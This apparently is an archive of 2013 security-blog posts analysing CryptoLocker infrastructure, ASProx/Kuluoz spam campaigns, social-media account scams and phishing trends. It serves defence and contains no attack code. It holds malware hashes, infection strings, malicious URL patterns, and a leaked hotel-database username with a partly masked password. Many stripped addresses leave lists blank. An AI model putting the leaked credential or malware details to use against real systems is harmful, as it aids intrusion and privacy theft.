Sunday, December 29, 2013

Tracking CryptoLocker with Malcovery & IID

First things first: Here are some IP addresses that Malcovery thinks you should block immediately because they are linked to CryptoLocker. You'll see how as you read on!,,,,,,,,,

UPDATED == Please add:,, to your blocking list!

A CryptoLocker walk-through

On December 19th, Malcovery malware analysts found two spam campaigns that were actively distributing malware that lead to CryptoLocker. The first of these was the focus of that day’s T3 report, on AT&T-themed spam. The AT&T spam and the Visa spam from that day both dropped a small “downloader” piece of malware.

The AT&T email had an attached .zip file named which was 8,810 bytes in size and had the MD5 be7d2f4179d6d57827a18a20996a5a42. When unpacked, the included .exe file, VoiceMail.exe, was 15,872 bytes in size and had the MD5 d1ca2dc1b6d1c8b32665fcfa36be810b. At the time of the report, the only VirusTotal detections for that piece of malware were 5 of 49, with most major AV companies failing to detect.

VirusTotal Report 5 of 49,248,248

The downloaded Zeus sample, wav.exe had an MD5 of a4bdb44128ca8ee0159f1de3cf11bee0 and was also very poorly detected. The VirusTotal report at that time showed only 8 of 49 detections. Of the major US-based AV, McAfee and TrendMicro detected it, both confirming a Zeus variant.

VirusTotal Report 8 of 49 detects

Immediately after becoming infected with the GameOver version of Zeus, the machine downloaded cryptolocker malware from another site.,912
That file, dss.exe, had the MD5 of db482a193060f7d5b81d7779b9414009 and was almost entirely undetected, registering only 1 of 49 on VirusTotal at the time of the report, although now detected by more than 30 AV products. Only Chinese-based Rising software detected this as malware at the time we first saw it at Malcovery Security.

VirusTotal 1 of 49.


There are several interesting things we found as we examined this CryptoLocker sample. Perhaps the best way to explain them is to show some of these screenshots first.

#1. This was the first screen that we saw after infection, letting us know we needed to pay a $300 ransom if we anted to decrypt our files.

#2. Our Windows wallpaper was replaced with this image, so we couldn't miss the fact that we were infected.

#3. There was a pull-down menu that gave us two choices of how we wanted to pay. The first choice was to pay 0.6 BitCoins.

#4. This is the BitCoin Account we were supposed to send our money to. We would appreciate anyone else who is infected sending out a tweet with the hashtag "#CryptoBitCoin" letting us know which BitCoin purse you were supposed to send payment to.

#5. We're trying to learn more about the option to pay with a GreenDot MoneyPak. Although we tried to make a payment this way, two valid MoneyPak's that we tried to send were rejected.

CryptoLocker & IID

The CryptoLocker malware has a Domain Generation Algorithm (DGA) that causes it to generate as many as a thousand domain names based on the date of the infection. As we ran the malware on several different occasions, we realized that of the thousands of tested domains, the domains that resolved tended to resolve to the same IP address, In a DGA, bad guys attempt to protect their botnet by having many possible domain names generated using an algorithm that allows both the bots and the author to know what domains might be valid on a given date in the future. Each bot calculates the current domain possibilities, and begins "calling out" to each of those names. Most of them fail to resolve. But as long as even ONE domain resolves (meaning the criminals, or a sink-hole researcher, have registered the domain), the bot can make connection to generate a valid encryption key and continue the scam. Once the date has passed, the domains are no longer useful, except as evidence, but if the IP addresses are being re-used, this gives us a way of protecting systems.

Malcovery Security's daily "Today's Top Threat" reports share details about the top spam campaigns that are distributing malware. Recipients of the T3 reports would have been provided with all of the IP addresses, MD5s, and VirusTotal reports above as part of this report:

As happens in so many cases, the IP address warned about in this report provides lasting protection, as the same IP was used for CryptoLocker from that day forward. But were there other IP addresses involved as well?

Because Malcovery Security is a partner with Internet Identity, we ran the IP against their Passive DNS Database. IID's President Rod Rasmussen and Threat Intelligence VP Paul Ferguson gave us permission to share some of what we learned there.

CryptoLocker Domains found on

Dec 13,
Dec 13,
Dec 13,
Dec 14,
Dec 16,
Dec 16,
Dec 16,
Dec 16,
Dec 18,
Dec 18,
Dec 18,
Dec 18,
Dec 18,
Dec 18,
Dec 19,
Dec 20,
Dec 20,
Dec 20,
Dec 20,
Dec 23,
Dec 23,
Dec 24,
Dec 24,
Dec 24,
Dec 24,
Dec 24,
Dec 24,
Dec 26,
Dec 26,
Dec 27,
Dec 27,
Dec 27,
Dec 28,
Dec 28,
Were these other domains also used for CryptoLocker? YES! And here is one of the ways that we can tell. When you visit a CryptoLocker domain, there are two very interesting things about them. First, they offer Technical Support for their decryption service on these domains

As we examine the NAMESERVER choices on the domains above, we can use the Passive DNS service to find other IP addresses that use some of the same Nameservers.

The fact that at various times this DNS server, known to be associated with CryptoLocker Domain Generation Algorithm-created Domain names, has been seen on these IP addresses makes these IP addresses of interest. But does it look like they are hosting CryptoLocker Domains as well as the DNS? We used the IID Passive DNS to find lists of domain names hosted on these various IP addresses, and then checked to see whether they were used for Technical Support *OR* for distribution of Binaries associated with the CryptoLocker malware. Let's look at what we found!

Our original IP address,, was very frequently associated with spam domains related to "Ruby Casino" a criminally operated online gaming service. The IID Passive DNS service showed us dozens of "Ruby" related domains on many of these other domains as well. For each of the other IP addresses, we'll ask

- was a CryptoLocker TechSupport website found on this IP?
- was evidence of CryptoLocker Malware found on this IP?
- was this IP used by Ruby Casino spam domains?

On - - Positive for CryptoLocker TechSupport!
Confirmed (VT 40/48) CryptoLocker malware = file at /0388.exe!
Confirmed Ruby Casino domains!

On - - Positive for CryptoLocker TechSupport!
Confirmed CryptoLocker malware = file at /0388.exe
Previously used for Fake AV - see 0x3a blog post on Fake AV
Many Ruby Casino domains, such as,,

On - - Dec 28, 2013 - Positive for CryptoLocker!
Same binary (0388.exe) available here.
No Ruby Casino

On - - most CryptoLocker prior to December 6th.
Hosted malware on "" on October 31, 2013.
Many Ruby Casino domains, including and

On (Ukraine) - - most CryptoLocker prior to December 3rd.
Confirmed to have hosted Cryptolocker binary on November 21, 2013.
Many Ruby Casino domains, including and

On - - confirmed CryptoLocker on December 29th.
0388.exe binary available at IP or domain level.
Many Ruby Casino domains, including and

(, linked by IID Passive DNS based on common Ruby Casino domains on the previous IP address, was found to be actively hosting CryptoLocker Domains found here on October 30th confirmed to be CryptoLocker by our friends at Malware Must Die, including The most recent Crypto look alike was from December 10th. - - confirmed CryptoLocker domain on December 27th
. This IP has not been seen prior to December 27th. - not confirmed as CryptoLocker by passive DNS.
This IP *WAS* declared to be CryptoLocker in a new paper from Dell Secureworks' Keith Jarvis, more below. - - confirmed CryptoLocker domain on December 29th
. Also hosted the domain mentioned above.
Hosted several Ruby Casino domains, including and - dozens of CryptoLocker domains - confirmed TechSupport domains live on December 29th
0388.exe binary available on live domains, including
Hosted several Ruby Casino domains, including, and others.

Just on these IPs in the month of December, we find the following CryptoLocker domains:

1 Dec
1 Dec
3 Dec
3 Dec
5 Dec
5 Dec
5 Dec
5 Dec
5 Dec
5 Dec
5 Dec
6 Dec
6 Dec
7 Dec
7 Dec
7 Dec
7 Dec
7 Dec
7 Dec
7 Dec
9 Dec
9 Dec
10 Dec
10 Dec
10 Dec
10 Dec
10 Dec
10 Dec
10 Dec
11 Dec
11 Dec
11 Dec
11 Dec
12 Dec
12 Dec
13 Dec
13 Dec
13 Dec
14 Dec
16 Dec
16 Dec
16 Dec
16 Dec
18 Dec
18 Dec
18 Dec
18 Dec
18 Dec
18 Dec
19 Dec
20 Dec
20 Dec
20 Dec
20 Dec
23 Dec
23 Dec
24 Dec
24 Dec
24 Dec
24 Dec
24 Dec
24 Dec
26 Dec
26 Dec
27 Dec
27 Dec
28 Dec
28 Dec
28 Dec
28 Dec
28 Dec

We actually found THREE of the IP addresses that we found via Passive DNS analysis listed on a blog site in an article called CIS Cyber Alert Releases Recommendations to Combat Cryptlocker Malware by Thu Pham. That same article refers to a list of CryptoLocker C&C's that CIS is recommending to block. I list those IP addresses here from their list found at: CIS CryptoLocker List. Only three of the IP addresses listed by CIS are on on our list of ten.
Keith Jarvis of Dell SecureWorks released an excellent paper on CryptoLocker Ransomware on December 18, 2013. I just found it tonight as I was Googling for additional evidence on some of the IP addresses above. I highly recommend this resource, available at Dell SecureWorks CryptoLocker Ransomware.

The same Dell Secureworks paper made me aware of the excellent thesis BitIodine: Extracting Intelligence from the Bitcoin Network by Michele Spagnuolo.

Friday, December 27, 2013

ASProx spamming Court-Related malware

Court-related malware from ASProx

Update - new version of malware December 27th @6:15AM. see bottom

The same spamming botnet that is sending the Delivery spam that imitates Walmart, CostCo and BestBuy has also been busy sending out Court-related spam.

So far, there have been 9 different malware samples distributed by this campaign, which began on December 23rd at approximately 7:45 AM (US Central Time GMT -6)

Here are the relative distributions of each, where the first number is the number of spam samples collected in the Malcovery Security Spam Data Mine. The second column is the domain name used, the third is the MD5 of the .zip attachment, and lastly, in 15 minute increments, the first and last time period in which spam bearing this attachment was seen.

11633 | | 442e746ad1d185dd1683b1aa964f6e56 (2013-12-23 07:45 to 2013-12-23 21:00)
5979 | | 267d9f829ea2e3620ee62c52fcb4ebe9 (2013-12-23 16:30 to 2013-12-24 05:15)

Email subjects with counts for JonesDay were:

5050 of Subject: Urgent court notice NR#
4738 of Subject: Hearing of your case in Court NR#
4150 of Subject: Notice of appearance in court NR#
3640 of Subject: Notice to appear in court NR#

4365 | | b2f8e5d86d7c50b5017e88527d8ce334 (2013-12-24 07:45 to 2013-12-24 20:00)
142 | | 76cdb2bad9582d23c1f6f4d868218d6c (2013-12-24 08:00 to 2013-12-24 16:00)
651 | | 0f0bb7b4f67b3bd90e944fcf7473b9d8 (2013-12-24 14:15 to 2013-12-24 20:00)

Email subjects with counts for Latham Watkins were:

1477 of Subject: Urgent court notice No#
1319 of Subject: Hearing of your case in Court No#
1251 of Subject: Notice of appearance in court No#
1110 of Subject: Notice to appear in court No#

3054 | | 30336df44c6808175bf4a7c212d3e2f8 (2013-12-25 14:15 to 2013-12-26 03:00)
3236 | | f97795c2124f60596eb8faf18307ac35 (2013-12-25 05:15 to 2013-12-25 23:00)

Email subjects with counts for Hogan Lovells were:

1785 of Subject: Urgent court notice WA#
1615 of Subject: Hearing of your case in Court WA#
1547 of Subject: Notice of appearance in court WA#
1334 of Subject: Notice to appear in court WA#

3500 | | d181af2b32830119c0538851a8b53af8 (2013-12-26 06:00 to 2013-12-26 16:30)
484 | | 7c572385f09773237805a52e2fc106e9 (2013-12-26 12:00 to 2013-12-26 17:15)

Email subjects with counts for McDermett Will and Emery were:

1172 of Subject: Urgent court notice CH#
1009 of Subject: Hearing of your case in Court CH#
962 of Subject: Notice of appearance in court CH#
838 of Subject: Notice to appear in court CH#

I think this might make a good time to talk about malware detection rates. I'm going to do a "re-analyze" of each of these files on VirusTotal. Let's start with the oldest one first.

My "442e7" jonesday sample is: which contains the file "Court_Notice_Jones_Day_Washington.exe" with an internal timestamp of 12/23/2013 5:24 PM and a size of 121,344 bytes and an MD5 of 6933c76f0fbabae32d9ed9275aa60899.

VirusTotal says? 33 of 48.

My "267d9" jonesday sample is which contains the file "Court_Notice_Jones_Day__Washington.exe" with an internal timestamp of 12/23/2013 8:40 PM and a size of 123,904 bytes and an MD5 of 84fae8803a2fcba2d5f868644cb55dd6.

VirusTotal says? 35 of 48. Please note that seven of the AV's correctly identify this as Kuluoz while some call it DoFoil, and one of the majors calls it "FakeAVLock". (This malware does NOT act like a Fake anti-virus, and does not lock your computer.

My "b2f8e5" Latham & Watkins sample is: which contains the file "Court_Notice_Latham_and_Watkins__New_York.exe" with an internal timestamp of 12/24/2013 5:13PM 123,904 bytes in size and an MD5 of ac572ca741df1bbcc88183e27e7fce6c.

VirusTotal says? 34 of 48. After 2 days and 19 hours since first submission.

My "30336" Hogan & Lovells sample is: which contains the file "Court_Notice_Hogan_Lovells_WA_Washington.exe" with an internal timestamp of 12/25/2013 05:05 PM and 167,936 bytes in size and an MD5 of ebcb90d14904d596531fc8989c057f40.

VirusTotal says? 26 of 48 We still have one group calling it Zeus and one FakeAVLock. It's been on VT for 1 day and 12 hours at this point.

My "f9779" H&L sample is: which contains the file "Court_Notice_Hogan_Lovells_WA_Washington.exe" with an internal timestamp of 12/25/2013 9:42 AM and 167,936 bytes in size and an MD5 of bd4255eacbf47649570c58061d81f018.

VirusTotal says? 25 of 48.

And now the ones from today. My "d181a" sample from MWE is which contains the file "Court_Notice_Chicago_McDermott_Will_and_Emery.exe" with an internal timestamp of 12/26/2013 at 12:41 PM and a size of 163,328 bytes and an MD5 of 225b15d05fe6f5d24d23b426fcfd7a2d.

VirusTotal says? 21 of 45 .

And the most recent sample from MWE, "7c572", is which contains the file Court_Notice_McDermott_Will_and_Emery.exe with a timestamp of 12/26/2013 at 7:33 PM and a size of 163,328 bytes and an MD5 of c77ca2486d1517b511973ad1c923bb7d.

VirusTotal says? 21 of 46.

The AV Question

So, if we KNOW this is the same botnet, delivering the same malware, from the same family, why is the detection rate after three days only 75%? Why is the detection rate for Day four of the campaign still only 50% or less? Recently my friend Graham Cluley ran a guest-blog on his personal blog called The Massive Lie about Anti-Virus Technology. His guest blogger, Stephen Cobb, made this statement in the blog, his big prediction for 2014:
The media will repeat a massive lie about anti-virus technology. I predict that in 2014 every major newspaper and magazine will perpetuate, to the detriment of data security and human understanding, the grossly erroneous notion that “for an anti-virus firm to spot malware, it first needs to have seen the malware, recognized that it’s malicious code, and written a corresponding virus signature for its products.”

He goes on to say that anyone who believes that Anti-Virus has to develop a signature in order to detect malware would be similar to Car & Driver magazine assuming that automobiles must still be starting by turning a crank at the front of the car. The problem is, Stephen is wrong.

On day one of the "Court" version of this Kuluoz malware, would you like to see what the detection rate was of the malware that is now "33 of 48" on VirusTotal? Here's a clip from the Malcovery Security "Today's Top Threat" report for that day, which featured the "JonesDay" version of the malware mentioned above.

In that report, Malcovery malware analyst Brendan Griffin points out that beginning at 7:45 that morning we had seen 167 spam messages from this campaign in a single 15 minute period with the volume hitting 8932 messages by 2 PM.

The problem, of course, was that at 2 PM, only FOUR of the 48 Anti-virus products were detecting the malware as being something bad that should be blocked. Here's the VirusTotal report showing 4 of 47 detects at the time of Malcovery's report. Note the MD5's and assure yourself it is the same one that, three days later, is showing 33 of 48 above.

But wait! Didn't Mr. Cobb assure us that anti-virus products now detect malware in many clever ways that don't rely on writing signatures? Perhaps they do, but they certainly weren't doing it on this sample. I'm not sure which heuristic was supposed to be protecting us as we successfully infected ourselves and watched our traffic flow to the C&C server at on port 8080. I certainly agree that AV products should always be installed "in the suite" of security protections. Hostile URLs should be blocked, but the problem is that in a great many cases, no one is blocking anything. We *DID* report our C&C server's URL to, who assured us there was nothing malicious going on there (See URLQuery report for We also noted that the spam we were receiving was from IP addresses that were not being blocked by reputation at the beginning of this campaign, though later a good many of them were.

I told Graham that when I saw his headline "The Massive Lie about Anti-Virus" I was assuming it was THE OTHER massive lie. The one where we tell consumers, "please make sure you let your AV update itself automatically and everything will be ok!"

Updated - December 27, 2013 @ 6:15 AM Central time

The spam campaign has reverted back to senders. We've seen 50 new copies already this morning, with a new MD5.

The zip file is 195db522bfbf399ec4f89455e9f05088. My sample was named which contained the exe file Court_Notice_Jones_Day__Washington.exe which is 162,816 bytes in size and had an internal timestamp of 12/27/2013 08:52 AM. The .exe has an MD5 of 48e4b1e322e7c5fd53b6745e8b2409e6. VirusTotal is reported 12 of 46 detection rate.

Thursday, December 26, 2013

Holiday Delivery Failures lead to Kuluoz malware

As Christmas grew closer and people began to worry about whether their online purchases would reach their destinations in time to be placed beneath the Christmas Tree, online scammers decided to take advantage of this natural fear to install malware on the computers of unsuspecting nervous nellies. One television news program today interviewed a woman who had almost fallen for one of these scams in a story they called Costco Customers Targeted in Phishing Scam. In that story, the shopper, Marianne Bartley, said the email she had received told her a package had not been delivered and that she would receive a refund, but if she didn't fill out an online form, she would be penalized 21% of the purchase price.

The local news station, KOLO 8, contacted CostCo by telephone and received this automated warning:

"If you received an email concerning a delivery failure or cancellation: immediately delete the e-mail and do not reply. This is a phishing scam and was not sent by Costco. Costco is not affiliated with the e-mail in any way."

Here's the email that Marianne and hundreds of thousands of American Christmas shoppers have been receiving since December 19th at approximately 10 AM. The non-stop bombardment of spam continued throughout the day today, December 26th, and will likely continue tomorrow as well:

But it wasn't just CostCo. In fact, Walmart and BestBuy were also used in this spam campaign with emails that looked like these:

Each day the Malcovery Spam Data Mine processes more than a million spam email messages searching for dangerous threats like these and our analysts evaluate the threats and provide intelligence to customers to help them protect themselves. In this case, Malcovery has seen more than 3,000 copies of these "Delivery" emails, which come with one of several prominent Subject lines:

  • Express Delivery Failure
  • Standard Delivery Failure
  • Scheduled Home Delivery Problem
  • Delivery Canceling
  • Special Order Delivery Problem
  • Expedited Delivery Problem
  • Expedited Delivery Problem

The spam messages are being sent out by the ASProx spam-sending botnet. Although the emails can come from any username and any domain, the "Sender Name" (the human-friendly portion of the "From" address) has been consistent as one of these:

  • Best Buy
  • Best Buy Shipping Agent
  • Costco
  • Costco Shipping Agent
  • Costco Shipping Manager
  • Walmart
  • Walmart Delivery
  • Walmart Delivery Agent

What would happen if someone clicked on one of these emails? The actual destination would depend on which date and which email type they clicked on, but we have collected a fairly extensive list of destination websites. A full list of the 636 compromised websites that we have seen so far in this campaign is listed at the very end of this article. Just in the past four hours we've seen spam samples that went to each of these websites:                                                                                                                                                                            
Each of those websites has been broken into by a criminal's hacking program which has created many subdirectories on the server, each starting with either "/media/" or "/messages/" followed by a long random-looking string, followed by a "Form Name". Here a couple recent examples:

/media/J4oHEmjaJvBvrdXTz3KJ5i7G46NP5/dGAYZ5aN4O qs=/CostcoForm
/media/fs1vp YmmEnb7Z6ftU5jKPU7X9Gc3DsasqKZPCIooRc=/WalmartForm
/media/9mz6i EkIDix5uVIAMa4AuEYNuNf18/32d3lFXUnyIQ=/CostcoForm
The "message" path (and the two BestBuy Forms) were more common earlier in the campaign. In fact, on the 19th, we ONLY saw BestBuy samples of the spam:

/message/zZFXQdfn98Ze1SQS7s6a9/yldS qZDpeIXu2C4RRif8=/BbForm

What happens first is that the website prompts the visitor to save or open the file "" (or whichever form they have visited.)

If they choose "Open" it will show them that there is a form to be extracted within the .zip file.

If extracted or moved to the Desktop, the form will display a comforting Microsoft Word logo, despite the ".exe" extension

If the visitor tries to open the WalMartForm.exe program, they will get an error message, which is actually a file called WalmartForm.txt opening in Notepad:

If we check memory though, the program "WalMartForm.exe" has spawned an instance of "svchost.exe" which has some very interesting strings, including:

That IP is believed to be the Command & Control (C&C) server to which my infected computer instance is talking.

Other interesting strings include a "knock" tag:

       (debug)5.1 x32  none  none(/debug)(/knock)
The location of some additional malware dropped from the server:

C:\Documents and Settings\Owner\Local Settings\Application Data\kinwmeiq.exe

And a tag that SEEMS to show the username of the malware author, though I'll not include that here . . .

Note that even though this malware distribution campaign has been running for at least seven days, many major anti-virus products are still unable to detect the malware as being malicious. A VirusTotal report showed that only 20 of 48 anti-virus products currently detect the malware that I received when visiting the most recent website seen in spam. Neither of the two locally installed AV products on my machine detect the malware, and the URL I attempted to visit was not marked as dangerous by any of the systems I have installed. VirusTotal Report here.

Hacked websites used to Deliver Delivery malware

Update -- the following destination domains seen on December 27th & December 28th.

(147 rows)

Thursday, December 19, 2013

Help your compromised friends on Twitter and Facebook

Have some of your family and friends on Facebook or Twitter been posting some very strange messages recently? They have lost control of their accounts, possibly by entering their passwords on a phishing site, but more likely by having malware on their computer. At the bottom of this post, you'll find some tips on helping your friends by reporting the strange messages to Facebook and Twitter. You'll want to also advise them to update their anti-virus software and scan their computer for possible malware. Changing all of their passwords would be a Very Good Idea, but if they do it from a compromised computer, the bad guys will learn the new passwords as well.

Here are some details about recognizing compromised accounts for two recent scams -- "help identify the criminal" and "I quite my job, you should too!"

1. Facebook Friends want help identifying criminals

ysterday 4 dudes tried to steal my car. have youguys seen them? Here is their profile

ysterday 2 guys tried to steal my car. have youguys seen them? Here is the vid

ysterday 4 blackguys tried to steal my car. do you guys know them? Here is there pics

2days agos 2 white boys broke in my moms car. does anyone of you know them? Here is there pics

2 days agos 2 dudes tried to steal my car. have youguys seen them? Here is the vid

This morningg 5 dudes broke into my sisters house. have youguys seen them? Here is the vid

ysterday 5 black boys tried to steal my brothers car. does anyone of you know them? Here is the vid

3days agos 2 guys broke into my house. have youguys seen them? Here is their profile

Earlier todayy 3 dudes beat my dad up. have youguys seen them? Here is their profile

What are the odds that poor RS has had 3 guys steal his car, 5 guys break into his sister's car, and 2 dudes break into his brothers house in one week? Poor guy! How can we help him?

2. Facebook Friends quitting their job

From December 10th until yesterday, your friends weren't asking for help with criminals, they were all quitting their jobs! Messages like: I am finally quitting my j ob tomorrow after 14510 days of putting up with my idiot boss i just need to do it. I have no idea why i am workin' there anymore when ive been making about $200 dollars everyday for the past 6 months working at home. I am so happy I found this website -- with YOUR NAME and 21 others

One of my grad students at UAB was the first one to tip me off to this scam after his wife showed him suspicious posts for her friend! Our lesson? If you write malware, don't let it tag people who have family members working for me!

Sometimes the messages were about the dumb boss, idiot boss, childish boss, asss of a boss.

Your friend my have been "generating around" or "making around" some random number of dollars, $100, $200, $250, $300 for some random number of months.

As you can see from SO's page, the same people who have lost control of their accounts for the first scam are also targeted by the second scam:

When I was searching for the unique spelling of "QUIT MY J OB" with the space in the word Job, I noticed the posts were also all over Twitter:

Twitter => Facebook version

If the victim has both a Twitter and a Facebook account, the Twitter account drives traffic to the Facebook account that then sends them on to Tumblr.

Here is one of many dozens of examples where "JJ" had a twitter account that posts a link to a Facebook shortened "" link where JL has tagged seven of her friends in the message.

Instead of REPORTING THIS AS SUSPICIOUS, Her friend "Liked" the post!!!

AG had the same issue - his Twitter post sends traffic to the Facebook post, that sends to the Tumblr page.

VR's posts go the same way ... Twitter => Facebook => Tumblr

Quite a few other Twitter posts also send visitors to Facebook pages . . .

Twitter => Direct to Tumblr

Today we are seeing more of the Twitter links pointing directly to Tumblr, bypassing the Facebook component of the scam.

Help your Facebook Friends?

If one of your friends has had this happen to them, the best thing to do is to REPORT THE POST TO FACEBOOK, and then send them a message.

First, use the "pull down" arrow at the top right of the message to choose "Report/Mark as Spam"

After you hit "Report", click the WORD "Report" underneath the message to give more context to your report.

Tell them that this is "Spam or Scam" and hit "Continue"

After you get your Thank You from Facebook's Security team, follow the link to "Help Center Security section"

On that link, choose "Hacked Accounts" -- Note: You can share this link with your friends by telling them to visit: HTTPS://WWW.FACEBOOK.COM/HELP/SECURITY/

There are several good sets of information that can help your friend with the hacked account, or help you learn more about helping your friends! Be the Security Expert in your group of friends, share this information with them!

Help your Twitter Friends?

On Twitter, use the ...More button to begin your report

What happens on the TUMBLR Pages?

That part is still a work in progress . . . for now, trust me. Don't go there! I'll update here when I can share more details.

Saturday, December 14, 2013

Top Brands Imitated by Malicious Spam

WebSense recently released an InfoGraphic titled "Top Five Subject Lines in Phishing Emails." for January 1, 2013 through September 30, 2013. WebSense has a few differences in the way they gather their data, including being world-wide in their focus (most of my readers probably aren't receiving regular spam with the subject "Communicazione Importante"). But I also wondered about what is happening more recently. We know that the Cutwail spammers who were using the BlackHole Exploit server were the primary folks who were sending out all of those malicious LinkedIn emails, so have the top threats changed since Paunch and friends were arrested in October and the Black Hole Exploit server started drying up?
Malcovery Security has been putting out daily reports of the Top Threat Today in the malicious email world for all of 2013 (although at the beginning of the year they were still using their UAB-legacy name "Emerging Threats By Email"). These reports provide a "deep dive" look at the most prominent malware-laden email of the day. Mid-summer we made the determination that in addition to pushing out "THE" top threat, we would look at other significant malware campaigns of the day, and try to get those reports out faster and in a machine-consumable format.
Last week we presented a one-hour Webinar (still accessible, if you'd like to watch/listen to the recording) - State of Cybersecurity 2013/2014. The first 2/3rds of the webinar walks through the significant cybersecurity events of the year, followed by some Malcovery stats, like the chart shown below, followed by my Ten Security Predictions for 2014.

So, do we see LinkedIn spam as the most dangerous email "post-Paunch"? And for that matter, was it the most dangerous during the BlackHole dominated early portion of the year?
During the "Top Report of the Day" early part of the year, we saw WIDE variety of brands. In fact, in January our top reports included:
Adobe, ADP, American Airlines, BBB(4x), Bank of America, British Airways, Citibank, Digital Insights, DocuSign(2x), Dunn & Bradstreet, eFax, EFTPS (3x), FedEx, Facebook (2x), IRS, KeyBank, LinkedIn, PayPal, US Airways, Verizon, and Xerox.
LinkedIn earned the "Top Threat of the Day" position many times during the year, including January 21, April 9, April 10, July 26, August 28, September 27, and October 24. That is still less than ADP, which was the "Top Threat" on at least thirteen days (January 14, January 22, February 5, February 11, March 15, March 21, March 29, May 13, May 24, August 6, August 16, October 22, November 1st).
But what about the RECENT stuff? And how do things shape up when we look at ALL the significant malware threats we saw delivered by email instead of only "THE" top threat?

Malicious Spam Campaigns August 1 - December 13

For August 1 - December 13, here are the "Campaigns" that we saw most prominently in our T3 XML reporting:40 Days ==> Wells Fargo (+10 Days as "Top Threat" - August 6, 9, 23, September 16, 24, October 14, 29, 30, November 27, December 11)
40 Days ==> FedEx (+ 7 Days as "Top Threat" - September 5, 9, 10, 11, 17 & October 4, 10, 30)
24 Days ==> ADP (+ "Top" on August 6, 16, October 22, November 1)
23 Days ==> Facebook (+ September 6, 27)
22 Days ==> HMRC (Her Majesty's Revenue & Customs) (+ October 21)
19 Days ==> "Picture" spam (+ October 23, November 8, 18, 22, December 10, 13)
16 Days ==> Royal Bank of Scotland
15 Days ==> Companies House UK
11 Days ==> Sage
10 Days ==> American Express
10 Days ==> HSBC
10 Days ==> LinkedIn (+ August 6, 16, October 22, November 1)
9 Days ==> Dun & Bradstreet
So what does "Most Dangerous" mean? I would certainly agree that a very-well crafted graphical LinkedIn invitation is more likely to be clicked on than a poorly worded letter from a Wells Fargo advisor with a .zip attachment that I'm supposed to open. It could be that WebSense's scoring system takes into account their observed "click-through and attempted click-through" rate, but our measure shows LinkedIn in 10th place as far as active malicious spam campaigns since August 1st, and only two days since the estimated arrest date of Paunch -- October 16th and October 24th.

20 Million Chinese Hotel Guests have data leaked

This morning Secure Computing shared a brief article about Data on 20 Million Chinese Hotel Guests being shared by hackers. Unfortunately the only link in the article was a search for the word Breach on SCMagazine's own website.

The source was South China Morning Post, which has actually been writing about this for some time. On October 11, Amy Li reported that "Home Inn Hotels" a popular discount chain, and Hanting Hotel Group, were using "faulty hotel management software" developed by CNWISDOM. This was reported by "independent internet security watchdog". The NASDAQ traded hotel chain eventually acknowledged the vulnerability, which they described as a weakness in their Wireless Portal Security System, and announced on their home page that the issue had been resolved, thanking WooYun for helping them with the vulnerability.

CNWisdom Data Leaks

Shortly after the initial exchange, a seller on Taobao (think Chinese eBay) announced that he was selling 8 Gigabytes of hotel guest data for 2,000 Yuan. South China Morning Post reported that the chain had 450,000 hotel rooms in 4,500 hotels, and that when guests register, they are required to provide their home address, phone number, ID card, date of birth, and workplace if they want to use the WiFi service. This is apparently the data that was received.

As reported in Patrick Boehler December 9th story in the South China Morning Post, Chinese Hackers Leak Hotel Guest Data on WeChat, multiple websites were distributing the hotel data for 20 million guests, and some enterprising hackers had even built a chat interface allowing you to TXT someone's ID card number to the service and having it reply with the details of any hotel stays by that guest.


WooYun regularly shares vulnerability data, so we thought we would start at the beginning and find that. There were several "cnwisdom" breach reports there, including:

WooYun-2013-41171 (submitted October 28, 2013) - which referred to an SQL injection vulnerability

WooYun-2013-41171 (submitted October 27, 2013) - which referred to a STRUCTS problem

WooYun-2013-034935 (submitted August 21, 2013) - the WiFi Data Leak

Unfortunately, I have to rely on some Google Translate here ...

The way WooYun explains it is (Gary's paraphrase of the Google Translate of what they said:)

"Users connect to their hotel's open WiFi, which requires them to use a webpage to authenticate. That webpage is using http protocol, which means the username and password are transmitted in the clear. But the next phase of the authentication is to update a central database of WiFi information. IN THE CLEAR, the authentication connects to a database using the username "cnwisdomapi" and the password "3b823[马赛克]ac36a"!!
That authentication userid and password can be used to query details for anyone who used the WIFI in ANY of these hotels!

After the media used this screen shot in their reports, the Hotel chain responding saying that the screen shot did not represent personal information of their guests.

The "Vulnerability Response" section says that the vendor was notified and confirmed the vulnerability on August 26th. On October 8th, they replied that the Vulnerabilities had been repaired and a proper authentication method that preserved encryption throughout the process to protect guests had been implemented.

WooYun and 189

This is hardly the first major breach from WooYun! In January they reported serious vulnerabilities in the Chinese telecom giant 189's infrastructure that allowed any user with a webbrowser to get detailed billing information, including the user name, address, and detailed call history for any mobile phone user!

The same breach reported also shared details on how any one could access a webserver on "" and use the "wapLogin/sendSms.action" to send unauthenticated SMS messages to any cell phone!

In a wonderful example of responsible reporting, WooYun declared the vulnerability to be "Level 20" (their highest rank) and reported the details to the CNCERT National Internet Emergency Center on January 22 prior to releasing the details publicly on March 8, 2013.

Friday, December 13, 2013

Indian Banks targeted in multi-brand Phishing Attack

Malcovery Security's PhishIQ portal is a fascinating place to explore. This week I did a "Security Year in Review" webinar for an audience of our customers and friends which was so much fun to prepare! (We recorded the webinar for those who missed it - you can watch the recording here: State of Cybersecurity 2013/2014. We reviewed the top security events of 2013, including some of the biggest hacks, the most prominent malware trends, and the successes that our security community - researchers, security companies, and law enforcement - had in responding to these challenges. I also shared my Ten Security Predictions for 2014. I've posted those to the LinkedIn group Enterprise Security Intelligence & Big Data and would love to hear your thoughts on them. Please consider joining our group and the conversation!

Malcovery Security 2014 Prediction #9: Phishing will hit hard in the emerging online banking markets in India and China

This prediction is based on a few things. The criminals in the phishing world are international. Although most phishing victims continue to be in the United States at the present time, the reason for this is the widespread availability of high-speed Internet and the prominence of Online Banking. As China and India, who between them represent 36.5% of the world population, increasingly embrace online banking the criminals of the world will turn their eyes to this population who is now banking online, but who does not have decades of experience with Internet Safety issues leading up to them. I've already received some questions about this prediction, so I thought I would share some feedback on this one by showing some of the visibility we have in PhishIQ to the issue.

The basic work, unfortunately, has already been done for preparing to attack the Indian banks. Phishing kits exist and are in circulation for at least forty Indian banks that we have seen at Malcovery just during the previous month!

e-Police India shared a phishing attack on their website at the beginning of November about a phishing campaign imitating the Reserve Bank of India. In this phishing attack, the spammers have indicated that you need to "Select Your Bank From the List Below to Complete Your OAC Registration Process". Malcovery has seen this kit several times, including for example a live version today on "".

